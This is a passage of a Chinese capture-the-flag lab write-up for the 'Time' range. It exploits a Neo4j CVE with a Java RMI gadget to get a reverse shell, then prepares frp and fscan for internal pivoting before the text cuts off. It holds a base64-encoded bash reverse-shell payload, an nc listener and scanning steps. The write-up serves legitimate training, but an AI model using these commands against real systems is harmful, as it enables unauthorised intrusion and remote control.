春秋云境Time-WP【一遍过】

 重置了很多次靶机,所以靶机ip变化请忽略

flag01

fscan扫一下

7474、7687端口可以看出是neo4j(CVE),直接执行命令(base64编码中的ip和端口改成自己vps的ip和相应的端口)

java -jar rhino_gadget.jar rmi://39.99.151.101:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}"

vps上监听端口

nc -lvvp 5001  #之间在base64中开放了5001端口

get shell

找到flag01

find / -name flag*

flag02

ifconfig查看一下,内网网段172.22.6.0/24

将frp和fscan传入tmp目录下(不是tmp的话没有权限)

A机有文件要通过wget上传到B机,则需要在A机开启http服务

python3 -m http.server 80</
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值